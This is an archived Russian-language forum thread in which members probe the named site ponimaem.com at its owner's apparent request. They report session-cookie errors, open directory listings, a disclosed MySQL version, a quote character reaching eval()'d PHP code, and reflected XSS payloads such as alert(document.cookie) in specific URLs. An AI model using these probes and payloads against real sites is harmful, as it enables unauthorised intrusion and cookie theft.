Просмотр полной версии : Проверка на уязвимости сайта
Добрый день.
Прошу проверить сайт ponimaem.com на наличие дырок.
Буду очень благодарен.
Прошу прошения, если тему создал не там.
Добавляем спец.символы в куки,видим:
Code:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/otvetp/public_html/ponimaem.com/includes/header.php:25) in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25
Также есть возможность погулять по папкам
Code:
http://ponimaem.com/includes/
http://ponimaem.com/images/
При попытке постучаться на 3306 порт выплюнуло версию мускула
5.0.91-community
CheatCodeX
25.01.2011, 04:37
Подставляем ' в поле пароля видим
Code:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
В гостевую требуется капча
Ruslan1817
25.01.2011, 07:16
Code:
http://ponimaem.com/gb/index.php?pg=&t=">alert(document.cookie)
какой балбес Acunetix запускал ? )) Вы хоть руками тоже смотрите.
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
Нажимаем регистрация в поле вставляем '
kravch_v
07.12.2011, 22:33
XSS
http://ponimaem.com/test.php
Форма:
Code:
alert('xss')
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot